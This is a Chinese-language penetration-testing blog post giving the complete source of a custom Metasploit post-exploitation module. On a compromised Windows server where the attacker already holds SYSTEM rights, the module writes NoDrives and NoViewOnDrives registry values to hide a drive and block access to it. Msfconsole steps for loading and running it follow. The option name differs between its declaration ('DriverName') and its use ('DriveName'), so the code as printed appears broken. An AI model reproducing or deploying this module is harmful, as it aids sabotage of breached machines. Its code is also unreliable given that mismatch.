渗透之——Metasploit自定义让磁盘失效的后渗透模块

​

一个可以禁用Windows 操作系统上的指定硬盘的程序，这里我们将脚本命名为：disable_drives_by_binghe.rb。

具体内容如下：

##
# Author 冰河
# Date 2019-01-12
# Description 禁用Windows操作系统上的指定硬盘的程序
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  
  def initialize
    super(
        'Name'        => 'Driver Disabler',
        'Description' => 'This Modules Hides and Restrict Access to a Drive',
        'Author'      => 'binghe',
        'License'     => MSF_LICENSE
    )
    register_options(
    [
      OptString.new('DriverName', [true, 'Please SET the Drive Letter'])
    ], self.class)
    end
   
   def run
    drive_int = drive_string(datastore['DriveName'])
    key1 = "HKLM\\SoftWare\\Microsoft\\WIndows\\CurrentVersion\\Policies\\Explorer"
    exists = meterpreter_registry_key_exist?(key1)
    if not exists
      print_good("Hidden Drive") 
      meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
      print_good("Restricting Access to the Drive")
      meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD',REGISTRY_VIEW_NATIVE)
    else
      print_good("Key Exist, Skipping and Creating Values")
      print_good("Hiding Drive")
      meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
      print_good("Restricting Access to the Drive")
      meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD',REGISTRY_VIEW_NATIVE)
     end
     print_good("Disabled #{datastore['DriveName']} Drive") 
    end
    
   def drive_string(drive)
    case drive
      when 'A'
        return 1
      when 'B'
        return 2
      when 'C'
        return 4
      when 'D'
        return 8
      when 'E'
        return 16
       end
    end 
end

注意：使用此脚本的前提是我们已经经过一系列的渗透拿到了目标Windows服务器的System权限。

接下来我们将脚本传到Kali的/usr/share/metasploit-framework/modules/post/windows/manage目录下，此时，我们在Kali下操作：

msfconsole
msf auxiliary(scanner/ssh/ssh_brute_by_binghe) > use post/windows/manage/disable_drives_by_binghe 
msf post(windows/manage/disable_drives_by_binghe) > show options

Module options (post/windows/manage/disable_drives_by_binghe):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DriverName                   yes       Please SET the Drive Letter
   SESSION                      yes       The session to run this module on.

msf post(windows/manage/disable_drives_by_binghe) > set DriverName D
DriverName => D
msf post(windows/manage/disable_drives_by_binghe) > run

此时，查看目标服务器的D盘确实被成功禁用了。